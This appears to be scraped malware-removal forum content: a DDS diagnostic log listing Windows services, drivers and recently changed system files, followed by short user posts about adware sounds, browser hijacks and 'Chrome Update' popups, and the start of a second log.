R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R3 lvrs64;Logitech RightSound Filter Driver;C:\WINDOWS\System32\drivers\lvrs64.sys [2012-10-26 351520]
R3 LVUVC64;@oem29.inf,%PID_082D_DD%(UVC);Logitech HD Pro Webcam C920(UVC);C:\WINDOWS\System32\drivers\lvuvc64.sys [2012-10-26 4758176]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2016-7-16 20480]
R3 NvStreamKms;NvStreamKms;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2014-10-31 26560]
R3 NvStreamNetworkSvc;NVIDIA Streamer Network Service;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [2015-4-17 3632576]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\WINDOWS\System32\drivers\nvvad64v.sys [2016-9-4 56384]
R3 RtlWlanu_OldIC;Realtek Wireless LAN 802.11n USB 2.0 Network Adapter;C:\WINDOWS\System32\drivers\rtwlanu_oldIC.sys [2016-7-16 3814400]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
R3 UsoSvc;Update Orchestrator Service for Windows Update;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2016-7-16 123232]
R3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2016-7-16 347328]
R3 WSDScan;WSD Scan Support;C:\WINDOWS\System32\drivers\WSDScan.sys [2016-7-16 24576]
R3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2016-7-16 216064]
S2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2016-7-16 44496]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2016-9-20 324224]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2016-7-16 18432]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2016-7-16 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2016-7-16 15360]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2016-7-16 44496]
S3 AppvStrm;AppvStrm;C:\WINDOWS\System32\drivers\AppVStrm.sys [2016-10-17 127328]
S3 AppvVemgr;AppvVemgr;C:\WINDOWS\System32\drivers\AppvVemgr.sys [2016-7-16 157024]
S3 AppvVfs;AppvVfs;C:\WINDOWS\System32\drivers\AppvVfs.sys [2016-7-16 141152]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
S3 bcmfn;bcmfn Service;C:\WINDOWS\System32\drivers\bcmfn.sys [2016-7-16 9728]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2016-7-16 9728]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2016-7-16 44496]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2016-7-16 38912]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2016-10-28 118272]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2016-7-16 346976]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2016-7-16 2104160]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2016-7-16 93184]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2016-7-16 44496]
S3 Garmin Device Interaction Service;Garmin Device Interaction Service;C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [2015-6-10 718792]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2016-7-16 20480]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2016-7-16 50016]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2016-7-16 33280]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2016-7-16 81408]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2016-7-16 64512]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2016-7-16 176384]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2016-7-16 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2016-7-16 113152]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2016-7-16 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2016-7-16 526176]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2016-7-16 35840]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2016-7-16 105824]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2016-7-16 101216]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2016-10-17 64352]
S3 MessagingService_48d4a;MessagingService_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2016-7-16 842584]
S3 MsSecFlt;Microsoft Security Events Component Minifilter;C:\WINDOWS\System32\drivers\mssecflt.sys [2016-7-16 179040]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2016-7-16 108896]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2016-7-16 90624]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2016-7-16 58720]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2016-7-16 61792]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 PimIndexMaintenanceSvc_48d4a;Contact Data_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2016-7-16 928608]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2016-7-16 88416]
S3 scmdisk0101;Microsoft NVDIMM-N disk driver;C:\WINDOWS\System32\drivers\scmdisk0101.sys [2016-7-16 123904]
S3 Sense;Windows Defender Advanced Threat Protection Service;C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2016-10-17 2889896]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2016-10-17 1312768]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2016-7-16 151904]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2016-7-16 44496]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2016-10-17 81760]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2016-7-16 32096]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2016-7-16 287744]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2016-7-16 95744]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2016-7-16 108544]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2016-7-16 50688]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2016-7-16 45568]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2016-7-16 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2016-7-16 263008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2016-7-16 96608]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2016-7-16 137056]
S3 UnistoreSvc_48d4a;User Data Storage_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2016-7-16 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2016-7-16 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2016-7-16 27488]
S3 UserDataSvc_48d4a;User Data Access_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2016-7-16 32256]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2016-7-16 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2016-7-16 44496]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2016-10-17 719360]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2016-7-16 44496]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2016-7-16 32096]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2016-7-16 64864]
S3 wisvc;Windows Insider Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 WpnUserService_48d4a;Windows Push Notifications User Service_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2016-12-9 258560]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2016-10-17 43520]
S4 AppVClient;Microsoft App-V Client;C:\WINDOWS\System32\AppVClient.exe [2016-10-17 823136]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S4 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S4 UevAgentDriver;UevAgentDriver;C:\WINDOWS\System32\drivers\UevAgentDriver.sys [2016-7-16 40288]
S4 UevAgentService;User Experience Virtualization Service;C:\WINDOWS\System32\AgentService.exe [2016-7-16 1227264]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2017-01-06 16:03:20 11781064 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{333BFE2C-DE51-4378-B70F-16527A639E60}\mpengine.dll
2017-01-04 16:27:58 11781064 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2016-12-16 15:18:13 -------- d-----w- C:\WINDOWS\LastGood.Tmp
2016-12-14 03:51:59 503808 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\Microsoft.Ink.dll
2016-12-10 00:21:39 98304 ----a-w- C:\WINDOWS\System32\browserbroker.dll
2016-12-10 00:20:59 91648 ----a-w- C:\WINDOWS\SysWow64\Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll
2016-12-09 19:59:06 16279288 ----a-w- C:\WINDOWS\SysWow64\nvwgf2um.dll
2016-12-09 19:58:58 14046888 ----a-w- C:\WINDOWS\System32\nvopencl.dll
2016-12-09 19:58:54 11378672 ----a-w- C:\WINDOWS\SysWow64\nvopencl.dll
2016-12-09 19:58:50 17722448 ----a-w- C:\WINDOWS\System32\nvd3dumx.dll
2016-12-09 19:58:44 14634024 ----a-w- C:\WINDOWS\SysWow64\nvd3dum.dll
2016-12-09 19:58:40 13957376 ----a-w- C:\WINDOWS\System32\nvcuda.dll
2016-12-09 19:58:34 11315752 ----a-w- C:\WINDOWS\SysWow64\nvcuda.dll
2016-12-09 19:58:22 2856736 ----a-w- C:\WINDOWS\SysWow64\nvapi.dll
2016-12-09 19:46:16 31532728 ----a-w- C:\WINDOWS\System32\nvoglv64.dll
2016-12-09 19:45:58 24217784 ----a-w- C:\WINDOWS\SysWow64\nvoglv32.dll
2016-12-09 19:45:30 960576 ----a-w- C:\WINDOWS\System32\NvIFR64.dll
2016-12-09 19:45:30 923200 ----a-w- C:\WINDOWS\SysWow64\NvIFR.dll
2016-12-09 19:38:58 919104 ----a-w- C:\WINDOWS\System32\NvFBC64.dll
2016-12-09 19:38:56 885824 ----a-w- C:\WINDOWS\SysWow64\NvFBC.dll
2016-12-09 19:38:46 1917640 ----a-w- C:\WINDOWS\System32\nvdispco6434201.dll
2016-12-09 19:38:38 4262584 ----a-w- C:\WINDOWS\System32\nvcuvid.dll
2016-12-09 19:38:34 4004536 ----a-w- C:\WINDOWS\SysWow64\nvcuvid.dll
2016-12-09 19:37:20 15310400 ----a-w- C:\WINDOWS\SysWow64\nvcompiler.dll
2016-12-09 19:37:14 23009344 ----a-w- C:\WINDOWS\System32\nvcompiler.dll
2016-12-09 19:18:20 1566920 ----a-w- C:\WINDOWS\System32\nvdispgenco6434201.dll
2016-12-08 22:08:50 1167568 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{4DA42AEE-36E8-4F07-BC3A-C5AED3CC748B}\gapaengine.dll
.
==================== Find3M ====================
.
2016-12-11 23:56:25 835576 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2016-12-11 23:56:25 177656 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2016-12-09 23:49:51 180224 ----a-w- C:\WINDOWS\System32\enrollmentapi.dll
2016-12-09 19:59:12 18806712 ----a-w- C:\WINDOWS\System32\nvwgf2umx.dll
2016-12-09 19:58:26 3245408 ----a-w- C:\WINDOWS\System32\nvapi64.dll
2016-12-09 19:53:50 76864 ----a-w- C:\WINDOWS\SysWow64\opencl.dll
2016-12-09 19:45:46 12914360 ----a-w- C:\WINDOWS\System32\drivers\nvlddmkm.sys
2016-12-09 10:42:15 1637728 ----a-w- C:\WINDOWS\System32\appraiser.dll
2016-12-09 10:42:14 137568 ----a-w- C:\WINDOWS\System32\acmigration.dll
2016-12-09 10:34:34 894096 ----a-w- C:\WINDOWS\System32\winresume.exe
2016-12-09 10:34:34 1051112 ----a-w- C:\WINDOWS\System32\winresume.efi
2016-12-09 10:33:26 1354320 ----a-w- C:\WINDOWS\System32\winload.efi
2016-12-09 10:33:26 1173496 ----a-w- C:\WINDOWS\System32\winload.exe
2016-12-09 10:32:11 7816032 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2016-12-09 10:30:39 377184 ----a-w- C:\WINDOWS\System32\drivers\clfs.sys
2016-12-09 10:29:23 2681200 ----a-w- C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-09 10:28:24 764392 ----a-w- C:\WINDOWS\System32\CoreMessaging.dll
2016-12-09 10:27:38 172528 ----a-w- C:\WINDOWS\System32\sspicli.dll
2016-12-09 10:20:21 2677544 ----a-w- C:\WINDOWS\System32\d3d10warp.dll
2016-12-09 10:20:20 2189664 ----a-w- C:\WINDOWS\System32\drivers\dxgkrnl.sys
2016-12-09 10:20:16 658784 ----a-w- C:\WINDOWS\System32\drivers\dxgmms2.sys
2016-12-09 10:20:13 402272 ----a-w- C:\WINDOWS\System32\drivers\dxgmms1.sys
2016-12-09 10:20:12 1738560 ----a-w- C:\WINDOWS\System32\WindowsCodecs.dll
2016-12-09 10:19:35 1293152 ----a-w- C:\WINDOWS\System32\LicenseManager.dll
2016-12-09 10:19:21 168424 ----a-w- C:\WINDOWS\System32\bcrypt.dll
2016-12-09 10:18:47 624048 ----a-w- C:\WINDOWS\System32\drivers\cng.sys
2016-12-09 10:18:21 2913144 ----a-w- C:\WINDOWS\System32\combase.dll
2016-12-09 10:18:16 1100128 ----a-w- C:\WINDOWS\System32\hvix64.exe
2016-12-09 10:18:15 1267512 ----a-w- C:\WINDOWS\System32\WinTypes.dll
2016-12-09 10:18:14 811872 ----a-w- C:\WINDOWS\System32\hvloader.exe
2016-12-09 10:18:12 947552 ----a-w- C:\WINDOWS\System32\hvloader.efi
2016-12-09 10:18:09 989024 ----a-w- C:\WINDOWS\System32\hvax64.exe
2016-12-09 10:15:26 8168000 ----a-w- C:\WINDOWS\System32\Windows.Media.Protection.PlayReady.dll
2016-12-09 10:15:18 1988560 ----a-w- C:\WINDOWS\System32\mfmp4srcsnk.dll
2016-12-09 10:14:50 1274712 ----a-w- C:\WINDOWS\System32\ole32.dll
2016-12-09 10:14:33 241504 ----a-w- C:\WINDOWS\System32\CloudExperienceHost.dll
2016-12-09 10:11:15 2048496 ----a-w- C:\WINDOWS\SysWow64\CoreUIComponents.dll
2016-12-09 10:10:58 1461200 ----a-w- C:\WINDOWS\System32\user32.dll
2016-12-09 10:10:40 1572768 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2016-12-09 10:09:27 455520 ----a-w- C:\WINDOWS\System32\securekernel.exe
2016-12-09 10:01:59 2323728 ----a-w- C:\WINDOWS\SysWow64\d3d10warp.dll
2016-12-09 10:01:43 1503544 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2016-12-09 10:01:08 861024 ----a-w- C:\WINDOWS\SysWow64\LicenseManager.dll
2016-12-09 10:00:58 106896 ----a-w- C:\WINDOWS\SysWow64\bcrypt.dll
2016-12-09 09:59:25 846560 ----a-w- C:\WINDOWS\SysWow64\WinTypes.dll
2016-12-09 09:59:24 2166752 ----a-w- C:\WINDOWS\SysWow64\combase.dll
2016-12-09 09:57:01 1852720 ----a-w- C:\WINDOWS\SysWow64\mfmp4srcsnk.dll
2016-12-09 09:57:00 6668040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2016-12-09 09:56:15 959112 ----a-w- C:\WINDOWS\SysWow64\ole32.dll
2016-12-09 09:52:21 1435896 ----a-w- C:\WINDOWS\SysWow64\user32.dll
2016-12-09 09:52:21 1415752 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2016-12-09 09:51:08 117240 ----a-w- C:\WINDOWS\SysWow64\sspicli.dll
2016-12-09 09:47:29 22563328 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2016-12-09 09:45:47 40448 ----a-w- C:\WINDOWS\System32\WordBreakers.dll
2016-12-09 09:45:43 206848 ----a-w- C:\WINDOWS\System32\win32k.sys
2016-12-09 09:42:29 227328 ----a-w- C:\WINDOWS\System32\cdd.dll
2016-12-09 09:41:22 380928 ----a-w- C:\WINDOWS\System32\wincorlib.dll
2016-12-09 09:41:06 32768 ----a-w- C:\WINDOWS\SysWow64\WordBreakers.dll
2016-12-09 09:40:38 147968 ----a-w- C:\WINDOWS\SysWow64\win32k.sys
2016-12-09 09:38:39 324608 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:37:29 261632 ----a-w- C:\WINDOWS\System32\indexeddbserver.dll
2016-12-09 09:37:10 411136 ----a-w- C:\WINDOWS\System32\facecredentialprovider.dll
2016-12-09 09:37:01 49152 ----a-w- C:\WINDOWS\System32\Windows.UI.Shell.dll
2016-12-09 09:36:56 425984 ----a-w- C:\WINDOWS\System32\aadcloudap.dll
2016-12-09 09:36:32 410112 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2016-12-09 09:36:09 3059200 ----a-w- C:\WINDOWS\System32\msi.dll
2016-12-09 09:36:05 231936 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:36:02 6285312 ----a-w- C:\WINDOWS\System32\Windows.Media.dll
2016-12-09 09:34:52 822784 ----a-w- C:\WINDOWS\SysWow64\Chakradiag.dll
2016-12-09 09:34:31 288768 ----a-w- C:\WINDOWS\SysWow64\wincorlib.dll
2016-12-09 09:33:42 3777536 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2016-12-09 09:33:37 1589760 ----a-w- C:\WINDOWS\System32\msdtctm.dll
2016-12-09 09:32:18 635904 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2016-12-09 09:31:22 3689984 ----a-w- C:\WINDOWS\SysWow64\msi.dll
2016-12-09 09:31:20 198656 ----a-w- C:\WINDOWS\SysWow64\indexeddbserver.dll
2016-12-09 09:31:11 313856 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2016-12-09 09:30:32 19413504 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2016-12-09 09:30:31 4612608 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.dll
2016-12-09 09:29:51 4749312 ----a-w- C:\WINDOWS\System32\SettingsHandlers_nt.dll
2016-12-09 09:28:55 1004544 ----a-w- C:\WINDOWS\System32\enterprisecsps.dll
2016-12-09 09:28:12 3306496 ----a-w- C:\WINDOWS\SysWow64\MFMediaEngine.dll
2016-12-09 09:27:55 5114368 ----a-w- C:\WINDOWS\System32\cdp.dll
2016-12-09 09:27:36 981504 ----a-w- C:\WINDOWS\System32\Windows.Security.Authentication.OnlineId.dll
2016-12-09 09:26:32 8129536 ----a-w- C:\WINDOWS\System32\Chakra.dll
2016-12-09 09:26:01 1692672 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
2016-12-09 09:25:28 376832 ----a-w- C:\WINDOWS\System32\CryptoWinRT.dll
2016-12-09 09:24:21 2275840 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2016-12-09 09:22:27 1490944 ----a-w- C:\WINDOWS\System32\lsasrv.dll
2016-12-09 09:22:06 2820096 ----a-w- C:\WINDOWS\System32\InputService.dll
2016-12-09 09:22:02 2688512 ----a-w- C:\WINDOWS\System32\Windows.UI.Logon.dll
2016-12-09 09:21:48 4746752 ----a-w- C:\WINDOWS\System32\jscript9.dll
2016-12-09 09:21:42 3616768 ----a-w- C:\WINDOWS\System32\win32kfull.sys
2016-12-09 09:21:31 1512960 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2016-12-09 09:21:04 716800 ----a-w- C:\WINDOWS\System32\ShareHost.dll
2016-12-09 09:20:36 730624 ----a-w- C:\WINDOWS\System32\fveapi.dll
2016-12-09 09:20:35 3198464 ----a-w- C:\WINDOWS\SysWow64\cdp.dll
2016-12-09 09:20:33 6044160 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2016-12-09 09:20:32 172544 ----a-w- C:\WINDOWS\System32\DeviceEnroller.exe
2016-12-09 09:20:05 187392 ----a-w- C:\WINDOWS\System32\mdmregistration.dll
2016-12-09 09:19:46 433664 ----a-w- C:\WINDOWS\System32\TextInputFramework.dll
.
============= FINISH: 8:44:31.37 ===============

Attached Files
File Type: txt attach.txt (12.3 KB)

Crazy ad sound in background!

I know it's malware because I got a message saying "abc can't run script" and I hear TV ads in the background. I ran MS Malicious software tool, Malwarebytes, Hitman and Zemana. Is there an easier way to fix this without all the steps on your site?

There were Trojans and all kind of bad stuff.

Thank you.


BTW it hijacked my Firefox and stuff but I got that back. But it's sooooo slooooww. It also hj my administrative but I got that back.

Chrome Update Malware

I keep getting the "Chrome Update" malware tab popping up in the Chrome browser.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.18538
Run by Steve at 12:30:18 on 2017-01-07
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.8175.3925 [GMT -5:00]
.
AV: ESET NOD32 Antivirus 8.0 *Enabled/Updated* {19259FAE-8396-A113-46DB-15B0E7DFA289}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: ESET NOD32 Antivirus 8.0 *Enabled/Updated* {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
